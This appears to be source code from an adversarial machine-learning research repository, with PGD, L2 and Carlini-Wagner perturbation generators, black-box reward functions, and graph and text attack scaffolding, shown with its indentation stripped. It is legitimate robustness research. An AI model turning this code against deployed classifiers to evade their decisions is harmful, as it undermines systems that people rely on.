pred = model(normalize(x + delta))
else:
if use_vae:
x = x.view(x.size(0), -1).unsqueeze(0)
z, mu, logvar = vae(x)
z = z.clamp(0, 1)
x = z.view(z.size(0), 1, 28, 28)
elif use_ae:
x = ae(x)
pred = model(x.detach() + delta)
recon_pred = model(x.detach())
out = pred.max(1, keepdim=True)[1] # get the index of the max log-probability
recon_out = recon_pred.max(1, keepdim=True)[1] # get the index of the max log-probability
loss = nn.CrossEntropyLoss(reduction="sum")(pred, target)
recon_image = (x)[0].detach()
if args.comet:
args.experiment.log_metric("Whitebox CE loss",loss,step=t)
plot_image_to_comet(args,recon_image,"recon.png")
if t % 5 == 0:
print(t, out[0][0], recon_out[0][0], loss.item())
loss.backward()
grad_sign = delta.grad.data.sign()
delta.data = delta.data + batch_multiply(0.01, grad_sign)
# Clipping is equivalent to projecting back onto the l_\infty ball
# This technique is known as projected gradient descent (PGD)
delta.data.clamp_(-epsilon, epsilon)
delta.data = clamp(x.data + delta.data,0.,1.) - x.data
delta.grad.data.zero_()
# if out != target:
# print(t, out[0][0], loss.item())
# break
if args.comet:
if not args.mnist:
clean_image = (image)[0].detach().cpu().numpy().transpose(1,2,0)
adv_image = (x + delta)[0].detach().cpu().numpy().transpose(1,2,0)
delta_image = (delta)[0].detach().cpu().numpy().transpose(1,2,0)
else:
clean_image = (image)[0].detach()
adv_image = (x + delta)[0].detach()
recon_image = (x)[0].detach()
delta_image = (delta)[0].detach().cpu()
plot_image_to_comet(args,clean_image,"clean.png")
plot_image_to_comet(args,adv_image,"Adv.png")
plot_image_to_comet(args,delta_image,"delta.png")
plot_image_to_comet(args,recon_image,"recon.png")
return out, delta
def single_white_box_generator(args, image, target, model, G):
epsilon = 0.5
# Create noise vector
x = image
opt = optim.SGD(G.parameters(), lr=1e-2)
print("Target is %d" %(target))
for t in range(args.PGD_steps):
delta, kl_div = G(x)
delta = delta.view(delta.size(0), 1, 28, 28)
delta.data.clamp_(-epsilon, epsilon)
delta.data = clamp(x.data + delta.data,0.,1.) - x.data
pred = model(x.detach() + delta)
out = pred.max(1, keepdim=True)[1] # get the index of the max log-probability
loss = -nn.CrossEntropyLoss(reduction="sum")(pred, target)
if args.comet:
args.experiment.log_metric("Whitebox CE loss",loss,step=t)
if t % 5 == 0:
print(t, out[0][0], loss.item())
opt.zero_grad()
loss.backward()
for p in G.parameters():
p.grad.data.sign_()
# Clipping is equivalent to projecting back onto the l_\infty ball
# This technique is known as projected gradient descent (PGD)
# delta.data.clamp_(-epsilon, epsilon)
# delta.data = clamp(x.data + delta.data,0.,1.) - x.data
opt.step()
if out != target:
print(t, out[0][0], loss.item())
break
if args.comet:
if not args.mnist:
clean_image = (image)[0].detach().cpu().numpy().transpose(1,2,0)
adv_image = (x + delta)[0].detach().cpu().numpy().transpose(1,2,0)
delta_image = (delta)[0].detach().cpu().numpy().transpose(1,2,0)
else:
clean_image = (image)[0].detach()
adv_image = (x + delta)[0].detach()
delta_image = (delta)[0].detach()
plot_image_to_comet(args,clean_image,"clean.png")
plot_image_to_comet(args,adv_image,"Adv.png")
plot_image_to_comet(args,delta_image,"delta.png")
return out, delta
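# Note: white_box_untargeted above optimizes the perturbation `delta` directly with
# signed-gradient (PGD) steps and projects it back into the L-inf ball of radius
# epsilon, whereas single_white_box_generator instead takes signed-gradient steps
# on the parameters of the generator G that produces delta.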
def PGD_generate_multiple_samples(args,epoch,test_loader,model,G,nc=1,h=28,w=28):
epsilon = args.epsilon
test_itr = tqdm(enumerate(test_loader),\
total=len(test_loader.dataset)/args.test_batch_size)
correct_test = 0
correct_batch_avg_list = []
for batch_idx, (data, target) in test_itr:
x, target = data.to(args.device), target.to(args.device)
correct_batch_avg = 0
for t in range(10):
if not args.vanilla_G:
delta, kl_div = G(x)
else:
delta = G(x)
delta = delta.view(delta.size(0), nc, h, w)
# Clipping is equivalent to projecting back onto the l_\infty ball
# This technique is known as projected gradient descent (PGD)
delta.data.clamp_(-epsilon, epsilon)
delta.data = torch.clamp(x.data + delta.data,-1.,1.) - x.data
pred = model(x.detach() + delta)
out = pred.max(1, keepdim=True)[1] # get the index of the max log-probability
correct_batch_avg += out.eq(target.unsqueeze(1).data).sum()  # accumulate over the 10 draws
correct_batch_avg = correct_batch_avg / (10*len(x))
correct_batch_avg_list.append(correct_batch_avg)
correct_test += out.eq(target.unsqueeze(1).data).sum()
batch_avg = sum(correct_batch_avg_list) / len(correct_batch_avg_list)
print('\nTest set: Accuracy: {}/{} ({:.0f}%) | Multiple Samples Accuracy {:.0f}\n'\
.format(correct_test, len(test_loader.dataset),\
100. * correct_test / len(test_loader.dataset), batch_avg))
if args.comet:
if not args.mnist:
index = np.random.choice(len(x) - 64, 1)[0]
clean_image = (x)[index:index+64].detach()#.permute(-1,1,2,0)
adv_image = (x + delta)[index:index+64].detach()#.permute(-1,1,2,0)
delta_image = (delta)[index:index+64].detach()#.permute(-1,1,2,0)
else:
clean_image = (x)[0].detach()
adv_image = (x + delta)[0].detach()
delta_image = (delta)[0].detach()
plot_image_to_comet(args,clean_image,"clean.png",normalize=True)
plot_image_to_comet(args,adv_image,"Adv.png",normalize=True)
plot_image_to_comet(args,delta_image,"delta.png",normalize=True)
def PGD_test_model(args,epoch,test_loader,model,G,nc=1,h=28,w=28):
''' Testing Phase '''
epsilon = args.epsilon
test_itr = tqdm(enumerate(test_loader),\
total=len(test_loader.dataset)/args.test_batch_size)
correct_test = 0
for batch_idx, (data, target) in test_itr:
x, target = data.to(args.device), target.to(args.device)
# for t in range(args.PGD_steps):
if not args.vanilla_G:
delta, kl_div = G(x)
else:
delta = G(x)
delta = delta.view(delta.size(0), nc, h, w)
# Clipping is equivalent to projecting back onto the l_\infty ball
# This technique is known as projected gradient descent (PGD)
delta.data.clamp_(-epsilon, epsilon)
delta.data = torch.clamp(x.data + delta.data,-1.,1.) - x.data
pred = model(x.detach() + delta)
out = pred.max(1, keepdim=True)[1] # get the index of the max log-probability
correct_test += out.eq(target.unsqueeze(1).data).sum()
print('\nTest set: Accuracy: {}/{} ({:.0f}%)\n'\
.format(correct_test, len(test_loader.dataset),\
100. * correct_test / len(test_loader.dataset)))
if args.comet:
if not args.mnist:
index = np.random.choice(len(x) - 64, 1)[0]
clean_image = (x)[index:index+64].detach()#.permute(-1,1,2,0)
adv_image = (x + delta)[index:index+64].detach()#.permute(-1,1,2,0)
delta_image = (delta)[index:index+64].detach()#.permute(-1,1,2,0)
else:
clean_image = (x)[0].detach()
adv_image = (x + delta)[0].detach()
delta_image = (delta)[0].detach()
plot_image_to_comet(args,clean_image,"clean.png",normalize=True)
plot_image_to_comet(args,adv_image,"Adv.png",normalize=True)
plot_image_to_comet(args,delta_image,"delta.png",normalize=True)
def L2_test_model(args,epoch,test_loader,model,G,nc=1,h=28,w=28,mode="NotTest"):
''' Testing Phase '''
test_itr = tqdm(enumerate(test_loader),\
total=len(test_loader.dataset)/args.batch_size)
correct_test = 0
# Empty list to hold resampling results. Since we loop batches, results
# accumulate in appropriate list index, where index is the sampling number
resample_adv = [[] for i in range(args.resample_iterations)]
for batch_idx, (data, target) in test_itr:
x, target = data.to(args.device), target.to(args.device)
if not args.vanilla_G:
delta, kl_div = G(x)
else:
delta = G(x)
delta = delta.view(delta.size(0), nc, h, w)
adv_inputs = x + delta
adv_inputs = torch.clamp(adv_inputs, -1.0, 1.0)
pred = model(adv_inputs.detach())
out = pred.max(1, keepdim=True)[1] # get the index of the max log-probability
corr_adv_tensor = out.eq(target.unsqueeze(1).data)
correct_test += out.eq(target.unsqueeze(1).data).sum()
idx = corr_adv_tensor > 0
# Resample failed examples
if mode == 'Test' and args.resample_test:
re_x = x.detach()
for j in range(args.resample_iterations):
if len(re_x) == 0:
break
delta, kl_div = G(re_x)
adv_inputs = re_x + delta.detach()
adv_inputs = torch.clamp(adv_inputs, -1.0, 1.0)
pred = model(adv_inputs.detach())
out = pred.max(1, keepdim=True)[1] # get the index of the max log-probability
# From the previous correct-adv tensor, get indices of the correctly predicted samples,
# since we care about those on which the attack failed
correct_failed_adv = out.eq(target.unsqueeze(1).data)
failed_only = correct_failed_adv[idx]
for i in range(0,len(idx)):
if idx[i] == 1:
if correct_failed_adv[i] == 0:
idx[i] = 0
resample_adv[j].extend(failed_only.cpu().numpy().tolist())
print('\nTest set: Accuracy: {}/{} ({:.0f}%)\n'\
.format(correct_test, len(test_loader.dataset),\
100. * correct_test.cpu().numpy() / len(test_loader.dataset)))
if args.comet:
test_acc = 100. * correct_test / len(test_loader.dataset)
args.experiment.log_metric("Test Adv Accuracy",test_acc,step=epoch)
if not args.mnist:
index = np.random.choice(len(x) - 64, 1)[0]
clean_image = (x)[index:index+64].detach()
adv_image = (x + delta)[index:index+64].detach()
delta_image = (delta)[index:index+64].detach()
else:
clean_image = (x)[0].detach()
adv_image = (x + delta)[0].detach()
delta_image = (delta)[0].detach()
file_base = "adv_images/" + args.namestr + "/"
if not os.path.exists(file_base):
os.makedirs(file_base)
plot_image_to_comet(args,clean_image,file_base+"clean.png",normalize=True)
plot_image_to_comet(args,adv_image,file_base+"Adv.png",normalize=True)
plot_image_to_comet(args,delta_image,file_base+"delta.png",normalize=True)
# Log resampling stuff
if mode =='Test' and args.resample_test:
cumulative = 0
size_test = len(resample_adv[0])
for j in range(len(resample_adv)):
fooled = len(resample_adv[j]) - sum(resample_adv[j])
if len(resample_adv[j]) == 0:
percent_fooled = 0
else:
percent_fooled = fooled / len(resample_adv[j])
cumulative += fooled
cum_per_fooled = cumulative / size_test
print("Resampling perc fooled %f at step %d" % (percent_fooled,j))
print("Resampling perc cumulative fooled %f at step %d" % (cum_per_fooled,j))
if args.comet:
args.experiment.log_metric("Resampling perc fooled",percent_fooled,step=j)
args.experiment.log_metric("Resampling perc cumulative fooled",cum_per_fooled,step=j)
def carlini_wagner_loss(args, output, target, scale_const=1):
# compute the probability of the label class versus the maximum other
target_onehot = torch.zeros(target.size() + (args.classes,))
target_onehot = target_onehot.cuda()
target_onehot.scatter_(1, target.unsqueeze(1), 1.)
target_var = Variable(target_onehot, requires_grad=False)
real = (target_var * output).sum(1)
confidence = 0
other = ((1. - target_var) * output - target_var * 10000.).max(1)[0]
# if targeted:
# # if targeted, optimize for making the other class most likely
# loss1 = torch.clamp(other - real + confidence, min=0.) # equiv to max(..., 0.)
# else:
# if non-targeted, optimize for making this class least likely.
loss1 = torch.clamp(real - other + confidence, min=0.) # equiv to max(..., 0.)
loss = torch.mean(scale_const * loss1)
return loss
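# Usage sketch (hedged): with logits `pred` of shape [batch, args.classes] and integer
# class labels `target`, this untargeted hinge loss can be used as a drop-in
# misclassification loss, e.g. loss = carlini_wagner_loss(args, pred, target).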
def PGD_white_box_generator(args, train_loader, test_loader, model, G,\
nc=1,h=28,w=28):
epsilon = args.epsilon
opt = optim.Adam(G.parameters(),lr=1e-4)
if args.carlini_loss:
misclassify_loss_func = carlini_wagner_loss
else:
misclassify_loss_func = CE_loss_func
''' Training Phase '''
for epoch in range(0,args.attack_epochs):
train_itr = tqdm(enumerate(train_loader),\
total=len(train_loader.dataset)/args.batch_size)
correct = 0
# PGD_generate_multiple_samples(args,epoch,test_loader,model,G,nc,h,w)
PGD_test_model(args,epoch,test_loader,model,G,nc,h,w)
for batch_idx, (data, target) in train_itr:
x, target = data.to(args.device), target.to(args.device)
for t in range(args.PGD_steps):
if not args.vanilla_G:
delta, kl_div = G(x)
else:
delta = G(x)
kl_div = torch.zeros(1).to(x)  # deterministic (vanilla) G has no KL term
delta = delta.view(delta.size(0), nc, h, w)
# Clipping is equivalent to projecting back onto the l_\infty ball
# This technique is known as projected gradient descent (PGD)
delta.data.clamp_(-epsilon, epsilon)
delta.data = torch.clamp(x.data + delta.data,-1.,1.) - x.data
pred = model(x.detach() + delta)
out = pred.max(1, keepdim=True)[1] # get the index of the max log-probability
loss = misclassify_loss_func(args,pred,target) + kl_div.sum()
if args.comet:
args.experiment.log_metric("Whitebox CE loss",loss,step=t)
opt.zero_grad()
loss.backward()
for p in G.parameters():
p.grad.data.sign_()
opt.step()
correct += out.eq(target.unsqueeze(1).data).sum()
if args.comet:
args.experiment.log_metric("Whitebox CE loss",loss,step=epoch)
args.experiment.log_metric("Adv Accuracy",\
100.*correct/len(train_loader.dataset),step=epoch)
print('\nTrain: Epoch:{} Loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\n'\
.format(epoch,\
loss, correct, len(train_loader.dataset),
100. * correct / len(train_loader.dataset)))
return out, delta
def L2_white_box_generator(args, train_loader, test_loader, model, G,\
nc=1,h=28,w=28):
epsilon = args.epsilon
opt = optim.Adam(G.parameters())
mode = "Train"
if args.carlini_loss:
misclassify_loss_func = carlini_wagner_loss
else:
misclassify_loss_func = CE_loss_func
''' Training Phase '''
for epoch in range(0,args.attack_epochs):
train_itr = tqdm(enumerate(train_loader),\
total=len(train_loader.dataset)/args.batch_size)
correct = 0
if epoch == (args.attack_epochs - 1):
mode = "Test"
L2_test_model(args,epoch,test_loader,model,G,nc,h,w,mode=mode)
for batch_idx, (data, target) in train_itr:
x, target = data.to(args.device), target.to(args.device)
num_unperturbed = 10
iter_count = 0
loss_perturb = 20
loss_misclassify = 10
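# Keep updating G until the misclassification loss is driven to zero (attack succeeds
# under the chosen objective) or args.max_iter updates have been used for this batch.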
while loss_misclassify > 0 and loss_perturb > 0:
if not args.vanilla_G:
delta, kl_div = G(x)
kl_div = kl_div.sum() / len(x)
else:
delta = G(x)
kl_div = torch.zeros(1).to(x)  # deterministic (vanilla) G has no KL term
delta = delta.view(delta.size(0), nc, h, w)
adv_inputs = x.detach() + delta
adv_inputs = torch.clamp(adv_inputs, -1.0, 1.0)
pred = model(adv_inputs)
out = pred.max(1, keepdim=True)[1] # get the index of the max log-probability
loss_misclassify = misclassify_loss_func(args,pred,target)
if args.inf_loss:
loss_perturb = Linf_dist(x,adv_inputs) / len(x)
else:
loss_perturb = L2_dist(x,adv_inputs) / len(x)
loss = loss_misclassify + args.LAMBDA * loss_perturb + kl_div
opt.zero_grad()
loss.backward()
opt.step()
iter_count = iter_count + 1
num_unperturbed = out.eq(target.unsqueeze(1).data).sum()
if iter_count > args.max_iter:
break
correct += out.eq(target.unsqueeze(1).data).sum()
if args.comet:
acc = 100.*correct.cpu().numpy()/len(train_loader.dataset)
args.experiment.log_metric("Whitebox Total loss",loss,step=epoch)
args.experiment.log_metric("Whitebox Perturb loss",loss_perturb,step=epoch)
args.experiment.log_metric("Whitebox Misclassification loss",\
loss_misclassify,step=epoch)
args.experiment.log_metric("Train Adv Accuracy",acc,step=epoch)
print('\nTrain: Epoch:{} Loss: {:.4f}, Misclassification Loss \
:{:.4f}, Perturbation Loss {:.4f} Accuracy: {}/{} ({:.0f}%)\n'\
.format(epoch,\
loss, loss_misclassify, loss_perturb, correct, len(train_loader.dataset),
100. * correct.cpu().numpy() / len(train_loader.dataset)))
return out, delta
def soft_reward(pred, targ):
"""
BlackBox adversarial soft reward. Highest reward when `pred` for `targ`
class is low. Use this reward to reinforce action gradients.
Computed as: 1 - (targ pred).
Args:
pred: model log prediction vector, to be normalized below
targ: true class integer, we want to decrease probability of this class
"""
# pred = F.softmax(pred, dim=1)
pred_prob = torch.exp(pred) # pred is assumed to be log-probabilities
gather = pred_prob[:,targ] # gather target-class probabilities
ones = torch.ones_like(gather)
r = ones - gather
r = r.mean()
return r
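# Worked example (sketch): if the model assigns probability 0.8 to the target class,
# the per-sample reward is 1 - 0.8 = 0.2; pushing that probability down raises the reward.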
def hard_reward(pred, targ):
"""
BlackBox adversarial 0/1 reward.
1 if predict something other than target, 0 if predict target. This reward
should make it much harder to optimize a black box attacker.
"""
pred = F.softmax(pred, dim=1)
out = pred.max(1, keepdim=True)[1] # get the index of the max log-prob
# Hedged completion: return the 0/1 reward described in the docstring
# (1 when the prediction differs from targ).
return (out.squeeze(1) != targ).float().mean()
def CE_loss_func(args,pred, targ):
"""
Want to maximize CE, so return negative since optimizer -> gradient descent
Args:
pred: model prediction
targ: true class, we want to decrease probability of this class
"""
loss = -nn.CrossEntropyLoss(reduction="sum")(pred, targ)
loss = loss / len(targ)
return loss
def linf_constraint(grad):
"""
Constrain delta to l_infty ball
"""
return torch.sign(grad)
def reinforce(log_prob, f, **kwargs):
"""
Based on
https://github.com/pytorch/examples/blob/master/reinforcement_learning/reinforce.py
"""
policy_loss = (-log_prob) * f.detach()
return policy_loss
def reinforce_new(log_prob, f, **kwargs):
policy_loss = (-log_prob) * f.detach()
d_loss = torch.autograd.grad([policy_loss.mean()], [log_prob],
create_graph=True,retain_graph=True)[0]
return d_loss.detach()
def lax_black(log_prob, f, f_cv, param, cv, cv_opt):
"""
Returns policy loss equivalent to:
(f(x) - c(x))*grad(log(policy)) + grad(c(x))
The l_infty constraint should appear elsewhere
Args:
f: unknown function
f_cv: control variate
Checkout https://github.com/duvenaud/relax/blob/master/pytorch_toy.py
"""
log_prob = (-1)*log_prob
# Gradients of log_prob wrt to Gaussian params
d_params_probs = torch.autograd.grad([log_prob.sum()],param,
create_graph=True, retain_graph=True)
# Gradients of cont var wrt to Gaussian params
d_params_cont = torch.autograd.grad([f_cv], param,
create_graph=True, retain_graph=True)
# Difference between f and control variate
ac = f - f_cv
# Scale gradient, negative cv gradient since reward
d_log_prob = []
for p, c in zip(d_params_probs, d_params_cont):
d_log_prob.append(ac*p - c)
# Backprop param gradients
for p, g in zip(param, d_log_prob):
p.backward(g.detach(), retain_graph=True)
# Optimize control variate to minimize variance
var = sum([v**2 for v in d_log_prob])
d_var = torch.autograd.grad([var.mean()], cv.parameters(),
create_graph=True, retain_graph=True)
# Set gradients to control variate params
for p, g in zip(cv.parameters(), d_var):
p.grad = g
cv_opt.step()
return None
```
#### File: BlackMagicDesign/BMD_graph/utils.py
```python
import numpy as np
import torch
import torchvision
from torch import nn, optim
import torchvision.transforms as transforms
from torchvision import datasets
from torchvision.models import resnet50
import torchvision.utils as vutils
from torchvision.utils import save_image
import torch.nn.functional as F
import matplotlib.pyplot as plt
import torchvision.models as models
from dgl import DGLGraph
from dgl.data import register_data_args, load_data
from random import randint
from PIL import Image
import os
import time  # used by train_classifier below
from attack_models import GCN
import ipdb
def reduce_sum(x, keepdim=True):
for a in reversed(range(1, x.dim())):
x = x.sum(a, keepdim=keepdim)
return x.squeeze().sum()
def L2_dist(x, y):
return reduce_sum((x - y)**2)
def to_cuda(model):
cuda_stat = torch.cuda.is_available()
if cuda_stat:
model = torch.nn.DataParallel(model,\
device_ids=range(torch.cuda.device_count())).cuda()
return model
def tensor_to_cuda(x):
cuda_stat = torch.cuda.is_available()
if cuda_stat:
x = x.cuda()
return x
def sample_mask(idx, l):
"""Create mask."""
mask = np.zeros(l)
mask[idx] = 1
return mask
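# e.g. sample_mask([0, 2], 4) -> array([1., 0., 1., 0.])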
def calc_class_margin(probs,correct_indices):
correct_probs = probs[correct_indices].squeeze()
vals,inds = torch.topk(correct_probs,2,dim=1)
margin = vals[:,0] - vals[:,1]
top_margin, top_inds = torch.topk(margin,10)
bot_margin, bot_inds = torch.topk(-1*margin,10)
top_nodes = correct_indices[top_inds]
bot_nodes = correct_indices[bot_inds]
return top_nodes, bot_nodes
def evaluate(model, features, labels, mask):
model.eval()
with torch.no_grad():
logits = model(features)
probs = F.softmax(logits,dim=1)
logits = logits[mask]
labels = labels[mask]
_, indices = torch.max(logits, dim=1)
results = (indices == labels.cuda())
correct = torch.sum(results)
correct_indices = (results != 0).nonzero()
top_nodes,bot_nodes = calc_class_margin(probs,correct_indices)
return correct.item() * 1.0 / len(labels), correct_indices, top_nodes, bot_nodes
def get_data(args):
"""
Data loader. For now, just a test sample
"""
args.syn_train_ratio = 0.1
args.syn_val_ratio = 0.1
args.syn_test_ratio = 0.8
data = load_data(args)
features = torch.FloatTensor(data.features)
labels = torch.LongTensor(data.labels)
train_mask = torch.ByteTensor(data.train_mask)
val_mask = torch.ByteTensor(data.val_mask)
test_mask = torch.ByteTensor(data.test_mask)
args.in_feats = features.shape[1]
args.classes = data.num_labels
args.n_edges = data.graph.number_of_edges()
print("""----Data statistics------'
#Edges %d
#Classes %d
#Train samples %d
#Val samples %d
#Test samples %d""" %
(args.n_edges, args.classes,
train_mask.sum().item(),
val_mask.sum().item(),
test_mask.sum().item()))
train_mask = train_mask.cuda()
val_mask = val_mask.cuda()
test_mask = test_mask.cuda()
stop_number = int(np.round(len(labels)*0.1))
attacker_mask = torch.ByteTensor(sample_mask(range(stop_number), labels.shape[0]))
target_mask = torch.ByteTensor(sample_mask(range(stop_number), labels.shape[0]))
return features, labels, train_mask, val_mask, test_mask, data
def load_unk_model(args,data,features,labels):
"""
Load an unknown model. Used for convenience to easily swap unk model
"""
g = data.graph
# add self loop
if args.self_loop:
g.remove_edges_from(g.selfloop_edges())
g.add_edges_from(zip(g.nodes(), g.nodes()))
g = DGLGraph(g)
n_edges = g.number_of_edges()
# normalization
degs = g.in_degrees().float()
norm = torch.pow(degs, -0.5)
norm[torch.isinf(norm)] = 0
norm = norm.cuda()
g.ndata['norm'] = norm.unsqueeze(1)
# create GCN model
model = GCN(g,
args.in_feats,
args.n_hidden,
args.classes,
args.n_layers,
F.relu,
args.dropout).cuda()
load_file = 'saved_models/'+args.dataset+'_graph_classifier.pt'
# model.load_state_dict(torch.load('saved_models/graph_classifier.pt'))
model.load_state_dict(torch.load(load_file))
model.eval()
return model
def train_classifier(args, model, device,features, labels, train_mask, val_mask, test_mask, data):
model.train()
loss_fcn = torch.nn.CrossEntropyLoss()
# use optimizer
optimizer = torch.optim.Adam(model.parameters(),
lr=args.lr,
weight_decay=args.weight_decay)
# initialize graph
dur = []
for epoch in range(args.n_epochs):
model.train()
if epoch >= 3:
t0 = time.time()
# forward
logits = model(features)
loss = loss_fcn(logits[train_mask], labels[train_mask])
optimizer.zero_grad()
loss.backward()
optimizer.step()
if epoch >= 3:
dur.append(time.time() - t0)
acc, _, _, _ = evaluate(model, features, labels, val_mask)  # evaluate returns (acc, indices, top, bot)
print("Epoch {:05d} | Time(s) {:.4f} | Loss {:.4f} | Accuracy {:.4f} | "
"ETputs(KTEPS) {:.2f}". format(epoch, np.mean(dur), loss.item(),
acc, args.n_edges / np.mean(dur) / 1000))
print()
acc, _, _, _ = evaluate(model, features, labels, test_mask)
print("Test Accuracy {:.4f}".format(acc))
torch.save(model.state_dict(),'saved_models/graph_classifier.pt')
def freeze_model(model):
model.eval()
for params in model.parameters():
params.requires_grad = False
return model
```
#### File: BlackMagicDesign/BMD_text/main.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json, os, sys
import datetime
import argparse
# Comet will timeout if no internet
try:
from comet_ml import Experiment
except Exception as e:
from comet_ml import OfflineExperiment
from types import MethodType
import ipdb
from PIL import Image
import matplotlib.pyplot as plt
import torch
from torch import nn, optim
from torchvision import transforms
import torch.nn.functional as F
from torch import optim
from torch.autograd import Variable
import utils, models, text_attacks
import flows
from torch.nn.utils import clip_grad_norm_
from torchtext import data
from torchtext import datasets
from torchtext.vocab import Vectors, GloVe, CharNGram, FastText
from torch.nn.modules.loss import NLLLoss,MultiLabelSoftMarginLoss,MultiLabelMarginLoss,BCELoss
from attack_models import Seq2Seq, JSDistance, Seq2SeqCAE, Baseline_LSTM
import dataHelper
def main(args):
# Load data
if args.single_data:
data,target = utils.get_single_data(args)
else:
train_loader,test_loader,dev_loader = utils.get_data(args, args.prepared_data)
# The unknown model to attack, specified in args.model
unk_model = utils.load_unk_model(args,train_loader,test_loader)
# Try Whitebox Untargeted first
if args.debug:
ipdb.set_trace()
# TODO: do we need this alphabet?
ntokens = args.vocab_size
# ntokens = len(args.alphabet)
# inv_alphabet = {v: k for k, v in args.alphabet.items()}
# args.inv_alph = inv_alphabet
# Load model which will produce the attack
if args.convolution_enc:
G = Seq2SeqCAE(emsize=args.emsize,
glove_weights=args.embeddings,
train_emb=args.train_emb,
nhidden=args.nhidden,
ntokens=ntokens,
nlayers=args.nlayers,
noise_radius=args.noise_radius,
hidden_init=args.hidden_init,
dropout=args.dropout,
conv_layer=args.arch_conv_filters,
conv_windows=args.arch_conv_windows,
conv_strides=args.arch_conv_strides)
else:
G = Seq2Seq(emsize=args.emsize,
glove_weights=args.embeddings,
train_emb=args.train_emb,
nhidden=args.nhidden,
ntokens=ntokens,
nlayers=args.nlayers,
noise_radius=args.noise_radius,
hidden_init=args.hidden_init,
dropout=args.dropout,
deterministic=args.deterministic_G)
# Efficient compute
G = G.to(args.device)
if not args.no_parallel:
G = nn.DataParallel(G)
# Load saved
if args.load_model:
G = torch.load(args.adv_model_path)
print("Loaded saved model from: {}".format(args.adv_model_path))
# Maybe Add A Flow
norm_flow = None
if args.use_flow:
# norm_flow = flows.NormalizingFlow(30, args.latent).to(args.device)
norm_flow = flows.Planar
# Train white box
if args.white:
# Choose Attack Function
if args.no_pgd_optim:
white_attack_func = text_attacks.L2_white_box_generator
else:
white_attack_func = text_attacks.PGD_white_box_generator
# Test resampling capability
if args.resample_test:
# if not args.load_model:
# msg = "You need to pass --load_model to"
# msg += " load a model in order to resample"
# sys.exit(msg)
print("Starting resampling")
utils.evaluate_neighbours(test_loader, unk_model, G, args, 0)
sys.exit(0)
# Train on a single data point or entire dataset
elif args.single_data:
# pred, delta = attacks.single_white_box_generator(args, data, target, unk_model, G)
# pred, delta = attacks.white_box_untargeted(args, data, target, unk_model)
text_attacks.whitebox_pgd(args, data, target, unk_model)
else:
white_attack_func(args, train_loader,\
test_loader, dev_loader, unk_model, G)
# # Blackbox Attack model
# model = models.GaussianPolicy(args.input_size, 400,
# args.latent_size,decode=False).to(args.device)
# # Control Variate
# cv = models.FC(args.input_size, args.classes).to(args.device)
# # Launch training
# if args.single_data:
# pred, delta = text_attacks.single_blackbox_attack(args, 'lax', data, target, unk_model, model, cv)
# pred, delta = text_attacks.single_blackbox_attack(args, 'reinforce', data, target, unk_model, model, cv)
if __name__ == '__main__':
"""
Process command-line arguments, then call main()
"""
parser = argparse.ArgumentParser(description='BlackBox')
# Hparams
padd = parser.add_argument
padd('--batch-size', type=int, default=64, metavar='N',
help='input batch size for training (default: 64)')
padd('--latent_dim', type=int, default=20, metavar='N',
help='Latent dim for VAE')
padd('--lr', type=float, default=0.01, metavar='LR',
help='learning rate (default: 0.01)')
padd('--momentum', type=float, default=0.5, metavar='M',
help='SGD momentum (default: 0.5)')
padd('--latent_size', type=int, default=50, metavar='N',
help='Size of latent distribution (default: 50)')
padd('--estimator', default='reinforce', const='reinforce',
nargs='?', choices=['reinforce', 'lax'],
help='Grad estimator for noise (default: %(default)s)')
padd('--reward', default='soft', const='soft',
nargs='?', choices=['soft', 'hard'],
help='Reward for grad estimator (default: %(default)s)')
padd('--flow_type', default='planar', const='planar',
nargs='?', choices=['planar', 'radial'],
help='Type of Normalizing Flow (default: %(default)s)')
# Training
padd('--epochs', type=int, default=10, metavar='N',
help='number of epochs to train (default: 10)')
padd('--PGD_steps', type=int, default=40, metavar='N',
help='max gradient steps (default: 40)')
padd('--max_iter', type=int, default=20, metavar='N',
help='max gradient steps (default: 20)')
padd('--max_batches', type=int, default=None, metavar='N',
help='max number of batches per epoch, used for debugging (default: None)')
padd('--epsilon', type=float, default=0.5, metavar='M',
help='Epsilon for Delta (default: 0.5)')
padd('--LAMBDA', type=float, default=100, metavar='M',
help='Lambda for L2 lagrange penalty (default: 100)')
padd('--nn_temp', type=float, default=1.0, metavar='M',
help='Starting diff. nearest neighbour temp (default: 1.0)')
padd('--temp_decay_rate', type=float, default=0.9, metavar='M',
help='Nearest neighbour temp decay rate (default: 0.9)')
padd('--temp_decay_schedule', type=float, default=100, metavar='M',
help='How many batches before decay (default: 100)')
padd('--bb_steps', type=int, default=2000, metavar='N',
help='Max black box steps per sample (default: 2000)')
padd('--attack_epochs', type=int, default=10, metavar='N',
help='Max number of epochs to train G')
padd('--num_flows', type=int, default=30, metavar='N',
help='Number of Flows')
padd('--seed', type=int, default=1, metavar='S',
help='random seed (default: 1)')
padd('--batch_size', type=int, default=256, metavar='S',
help='Batch size')
padd('--embedding_dim', type=int, default=300,
help='embedding_dim')
padd('--embedding_type', type=str, default="non-static",
help='embedding_type')
padd('--test_batch_size', type=int, default=128, metavar='N',
help='Test Batch size. 256 requires 12GB GPU memory')
padd('--test', default=False, action='store_true',
help='just test model and print accuracy')
padd('--deterministic_G', default=False, action='store_true',
help='Auto-encoder, no VAE')
padd('--resample_test', default=False, action='store_true',
help='Load model and test resampling capability')
padd('--resample_iterations', type=int, default=100, metavar='N',
help='How many times to resample (default: 100)')
padd('--clip_grad', default=True, action='store_true',
help='Clip grad norm')
padd('--train_vae', default=False, action='store_true',
help='Train VAE')
padd('--train_ae', default=False, action='store_true',
help='Train AE')
padd('--white', default=False, action='store_true',
help='White Box test')
padd('--use_flow', default=False, action='store_true',
help='Add A NF to Generator')
padd('--carlini_loss', default=False, action='store_true',
help='Use CW loss function')
padd('--no_pgd_optim', default=False, action='store_true',
help='Use Lagrangian objective instead of PGD')
padd('--vanilla_G', default=False, action='store_true',
help='Vanilla G White Box')
padd('--single_data', default=False, action='store_true',
help='Test on a single data')
padd('--prepared_data',default='dataloader/prepared_data.pickle',
help='Path to the prepared (preprocessed) data pickle')
# Imported Model Params
padd('--emsize', type=int, default=300,
help='size of word embeddings')
padd('--nhidden', type=int, default=300,
help='number of hidden units per layer in LSTM')
padd('--nlayers', type=int, default=2,
help='number of layers')
padd('--noise_radius', type=float, default=0.2,
help='stdev of noise for autoencoder (regularizer)')
padd('--noise_anneal', type=float, default=0.995,
help='anneal noise_radius exponentially by this every 100 iterations')
padd('--hidden_init', action='store_true',
help="initialize decoder hidden state with encoder's")
padd('--arch_i', type=str, default='300-300',
help='inverter architecture (MLP)')
padd('--arch_g', type=str, default='300-300',
